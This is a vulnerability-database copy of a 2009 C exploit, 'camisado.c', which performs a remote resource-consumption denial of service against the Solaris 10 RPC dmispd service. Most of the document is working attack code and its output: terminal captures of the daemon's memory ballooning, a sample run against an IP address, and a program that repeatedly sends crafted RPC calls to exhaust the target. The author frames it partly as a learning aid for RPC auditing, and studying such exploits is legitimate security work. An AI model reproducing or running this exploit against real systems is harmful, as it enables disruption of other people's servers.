Vulners
Lucene search
Sun Solaris 10 RPC dmispd DoS
=============================
Sun Solaris 10 RPC dmispd DoS
=============================
# Title: Sun Solaris 10 RPC dmispd DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremy Brown
view source
print?
/*
camisado.c
AKA
Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit
***************************************************************************************************************
Another long night in ONC RPC fuzzing land...
# uname -a
SunOS unknown 5.10 Generic_139555-08 sun4u sparc SUNW,Ultra-5_10
# svcadm restart dmi
# date;sh stat.sh;date
Thursday, September 24, 2009 1:47:22 AM EDT
18651 root 3584K 2080K sleep 59 0 0:00:00 0.1% dmispd/1
18651 root 1047M 50M run 9 0 0:00:00 2.8% dmispd/1
18651 root 1047M 132M run 0 0 0:00:01 7.2% dmispd/1
18651 root 1047M 212M run 0 0 0:00:02 11% dmispd/1
18651 root 1047M 292M run 50 0 0:00:03 15% dmispd/1
18651 root 1047M 375M run 40 0 0:00:04 19% dmispd/1
18651 root 1047M 455M run 30 0 0:00:05 23% dmispd/1
18651 root 1047M 525M run 40 0 0:00:06 26% dmispd/1
18651 root 1047M 527M run 45 0 0:00:06 25% dmispd/1
18651 root 1047M 531M run 52 0 0:00:06 25% dmispd/1
18651 root 1047M 543M run 31 0 0:00:07 26% dmispd/1
18651 root 1047M 550M run 51 0 0:00:07 26% dmispd/1
18651 root 1047M 551M run 42 0 0:00:07 25% dmispd/1
18651 root 1047M 552M sleep 60 0 0:00:07 25% dmispd/1
18651 root 1047M 553M sleep 60 0 0:00:08 25% dmispd/1
18651 root 1047M 552M run 43 0 0:00:08 24% dmispd/1
18651 root 1047M 551M sleep 59 0 0:00:17 14% dmispd/1
18651 root 1047M 545M sleep 59 0 0:00:17 13% dmispd/1
^CThursday, September 24, 2009 1:48:47 AM EDT
#
And also...
# while true;do ps -AZfl | grep dmispd;sleep 1;done
0 S global root 19477 1 0 40 20 ? 448 ? 13:25:10 ? 0:00 /usr/lib/dmi/dmispd
0 S global root 19479 17588 0 40 20 ? 208 ? 13:35:27 pts/3 0:00 grep dmispd
0 R global root 19477 1 4 89 20 ? 134073 13:25:10 ? 0:01 /usr/lib/dmi/dmispd
0 R global root 19477 1 8 89 20 ? 134073 13:25:10 ? 0:02 /usr/lib/dmi/dmispd
0 R global root 19477 1 12 99 20 ? 134073 13:25:10 ? 0:03 /usr/lib/dmi/dmispd
0 R global root 19477 1 16 99 20 ? 134073 13:25:10 ? 0:04 /usr/lib/dmi/dmispd
0 R global root 19477 1 20 99 20 ? 134073 13:25:10 ? 0:05 /usr/lib/dmi/dmispd
0 R global root 19477 1 24 59 20 ? 134073 13:25:10 ? 0:06 /usr/lib/dmi/dmispd
0 R global root 19497 17588 0 44 20 ? 206 13:35:34 pts/3 0:00 grep dmispd
bash: fork: Resource temporarily unavailable
#
[email protected]:~$ ./camisado
Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit
Usage: ./camisado <target>
[email protected]:~$ ./camisado 192.168.0.236
Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit
Consuming Resources @ 192.168.0.236 [P:300598 V:1 F:523]...
--> #1
rpc: RPC: Timed out
--> #2
rpc: RPC: Timed out
--> #3
rpc: RPC: Timed out
--> #4
rpc: RPC: Timed out
--> #5
rpc: RPC: Timed out
--> #6
rpc: RPC: Timed out
--> #7
rpc: RPC: Timed out
Finished. Now your sun server may recover :)
[email protected]:~$
As far as I know, the RPC service "dmispd" is enabled by default on Solaris 10 (SPARC tested). It should render
the server unuseable for ~1-2 minutes. I'm not estatic about that part either. Fun to play with if nothing else.
And, If someone is interested in auditing RPC, this could be a good example to learn from. Learning isn't lame ;)
***************************************************************************************************************
camisado.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <errno.h>
#define PROG_NUM 300598
#define PROG_VER 1
#define DMIPROC_ADDROW 523
#define SIZE 100
#define LOOP 7
int main(int argc, char *argv[])
{
char b[SIZE], *buf, *target = argv[1];
int i, usock = RPC_ANYSOCK;
struct hostent *hp;
struct sockaddr_in us;
struct timeval tm={10, 0};
CLIENT *cli;
enum clnt_stat clnt_stat;
if(argc < 2)
{
printf("\nSun Solaris 10 RPC dmispd Remote Resource Consumption Exploit\n");
printf("Usage: %s <target>\n\n", argv[0]);
return 0;
}
printf("\nSun Solaris 10 RPC dmispd Remote Resource Consumption Exploit\n");
if((hp = gethostbyname(target)) == NULL)
{
perror("gethostbyname");
exit(-1);
}
memcpy(&us.sin_addr.s_addr, hp->h_addr, 4);
us.sin_family = AF_INET;
us.sin_port = 0;
if((cli = clntudp_create(&us, PROG_NUM, PROG_VER, tm, &usock)) == (CLIENT *)NULL)
{
clnt_pcreateerror("clntudp_create");
exit(-1);
}
cli->cl_auth = authunix_create_default();
memset(b, 'A', sizeof(b));
buf = b;
printf("\nConsuming Resources @ %s [P:%d V:%d F:%d]...\n\n", target, PROG_NUM, PROG_VER, DMIPROC_ADDROW);
for(i = 0; i < LOOP; i++)
{
printf("--> #%d\n", i+1);
clnt_stat = clnt_call(cli, DMIPROC_ADDROW, (xdrproc_t)xdr_wrapstring, (char *)&buf, (xdrproc_t)xdr_wrapstring, (char *)&buf, tm);
if(clnt_stat != RPC_SUCCESS) clnt_perror(cli, "rpc");
}
printf("\nFinished. Now your sun server may recover :)\n\n"); // restart dmi services to try again
auth_destroy(cli->cl_auth);
clnt_destroy(cli);
}
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Sep 2009 00:00Current
7High risk
Vulners AI Score7